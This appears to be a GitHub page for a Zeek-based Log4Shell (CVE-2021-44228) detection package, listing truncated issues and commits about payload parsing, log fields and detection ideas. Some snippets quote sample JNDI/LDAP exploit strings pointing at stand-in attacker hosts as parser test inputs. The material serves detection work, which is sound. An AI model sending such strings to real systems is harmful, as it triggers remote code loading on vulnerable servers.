cve-2021-44228
cve-2021-44228 copied to clipboard
corelight
Log4j Exploit Detection Logic for Zeek
…stead of string. This will be useful for callback detections! 2) Updated the parse_payload function to account for DNS name in the callback URL. eg: jndi:ldap://baddomain.xyz:1289/exploit This will be useful...
It is very handy when hunting and doing IR to have the id_orig_h and id_resp_h (actually even the id_orig_p and id_resp_p) in the log4j.log as fields . This is in...
This is probably not a huge deal, however, I just wanted to comment that the field names `target_host` and `target_port` in the log4j.log at first blush seem a bit misleading/confusing,...
Things get hairy when there are multiple IP addresses _and_ the exploit URI doesn't have `//`. e.g.: ``` print(parse_payload("https://18.x.x.x:443/${jndi:ldap:/10.0.16.1:1389/Exploit}")); print(parse_payload("https://18.x.x.x:443/${jndi:ldap://10.0.16.1:1389/Exploit}")); ... ~/code/cve-2021-44228 ben-jgj* ¡ zeek scripts [uri=10.0.16.1:1389/Exploit, stem=10.0.16.1:1389, host=10.0.16.1, port_=1389]...
Improve test case coverage, primarily focused on: 1. Detecting exploit strings, and 2. payload parsing Internally we have logs of hits from various sensors. It would be worth extracting those...
Are fingerprinting certificates and/or JA3 and JA3S useful as a way to detect exploit over the LDAPS channel. Even if a robust detection is not possible due to a myriad...
In the case of DNS exfiltration, we could potentially watch DNS requests for items that match a regex based on AWS/GCP/etc keys/IDs, and other artefacts that could be exfilled by...
Would it be possible to add the history field to the log4j or notice log? This can be useful when threat hunting and be able to rule out an attempt...
Raise a notice when activity in conn is seen to IP:ports that have been used in payloads. Such activity would mean a succesful exploit. requires clusterization
When a domain is used instead of an IP address in the payload, there will be a DNS lookup. watch for lookups to these payload domains and flag with a...